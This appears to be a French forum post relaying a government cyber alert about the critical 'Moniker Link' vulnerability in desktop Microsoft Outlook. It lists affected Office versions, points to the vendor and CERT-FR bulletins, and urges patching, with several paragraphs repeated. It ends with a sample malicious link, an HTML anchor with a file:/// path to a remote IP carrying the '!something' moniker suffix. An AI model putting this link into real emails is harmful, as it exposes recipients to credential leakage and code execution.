La plateforme Cybermalveillance.gouv.fr, le dispositif Alerte Cyber a été mis à contribution à trois reprises en 2021, cinq fois en 2022 et seulement deux fois en 2023.
Il sonne aujourd'hui l'alerte pour une vulnérabilité de sécurité critique affectant Microsoft Outlook.
Les produits affectés sont Microsoft Office 2016, Microsoft Office 2019, Microsoft Office LTSC 2021 et les applications Microsoft 365 (Microsoft 365 Apps for Enterprise).
La version web d'Outlook n'est pas touchée.
Pas de panique, cette alerte concerne principalement les entreprise, mais la prudence étant de mise, on vous conseille un correctif.
Bulletin de sécurité de l’éditeur
Bulletin du CERT.fr
Cette faille est baptisée Moniker Link.
Pour l'exploiter il suffit d'incorporer un simple lien malicieux dans un mail.
Le lien peut ressembler à ça :
Il sonne aujourd'hui l'alerte pour une vulnérabilité de sécurité critique affectant Microsoft Outlook.
Alerte Cyber : Faille de sécurité critique dans Microsoft Outlook
Une faille de sécurité critique a été corrigée dans le produit Microsoft Outlook de la suite Office pour Windows.
www.cybermalveillance.gouv.fr
La version web d'Outlook n'est pas touchée.
Pas de panique, cette alerte concerne principalement les entreprise, mais la prudence étant de mise, on vous conseille un correctif.
Bulletin de sécurité de l’éditeur
Security Update Guide - Microsoft Security Response Center
msrc.microsoft.com
Bulletin du CERT.fr
[MàJ] Vulnérabilité dans Microsoft Outlook – CERT-FR
www.cert.ssi.gouv.fr
Cette faille est baptisée Moniker Link.
Pour l'exploiter il suffit d'incorporer un simple lien malicieux dans un mail.
Le lien peut ressembler à ça :
Code:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>